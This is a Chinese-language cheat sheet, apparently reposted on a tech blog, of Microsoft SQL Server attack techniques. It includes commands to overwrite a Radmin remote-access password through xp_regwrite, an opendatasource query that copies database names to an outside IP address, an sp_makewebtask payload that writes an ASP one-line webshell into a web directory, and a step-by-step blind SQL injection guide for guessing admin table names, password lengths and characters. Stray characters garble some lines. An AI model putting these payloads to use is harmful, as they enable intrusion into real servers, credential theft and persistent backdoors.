
xp_terminate_process 2484
xp_unpackcab
解开压缩档。
xp_unpackcab 'c:\test.cab','c:\temp',1
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port'卖宽败,'REG_BINARY',0xd20400 则端口值改为1234
create database lcx
Create TABLE ku(name nvarchar(256) null)
Create TABLE biao(id int NULL,name nvarchar(256) null)
//得到数据库名 insert into opendatasource('sqloledb','server=211.39.145.163,1443uid=testpwd=pafpafdatabase=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL)--
用 sp_makewebtask直接在web目录里写入一句话马: http://127.0.0.1/dblogin123.asp?usernam ... btask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20'--
//更新表巧缺内容
Update films SET kind = 'Dramatic' Where id = 123
//删除内容
delete from table_name where Stockid = 3 SQL注射语句的经典总结
SQL注射语中颤句
1.判断有无注入点 ' and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目如果遇到0<返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin)
4.猜解字段名称在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0) and 1=(select count(*) from admin where len(密码字段名称password)>0)
5.猜解各个字段的长度猜解长度就是把>0变换直到返回正确页面为止 and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确长度是6 and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误长度是12 and 1=(select count(*) from admin where len(password)=12) 正确
6.猜解字符
and 1=(select count(*) from admin where left(name,1)='a') ---猜解用户帐号的第一位 and 1=(select count(*) from admin where left(name,2)='ab')---猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
看服务器打的补丁=出错了打了SP4补丁 and 1=(select {AT}@VERSION)--
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 and 1=(Select IS_SRVROLEMEMBER('sysadmin'))--
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)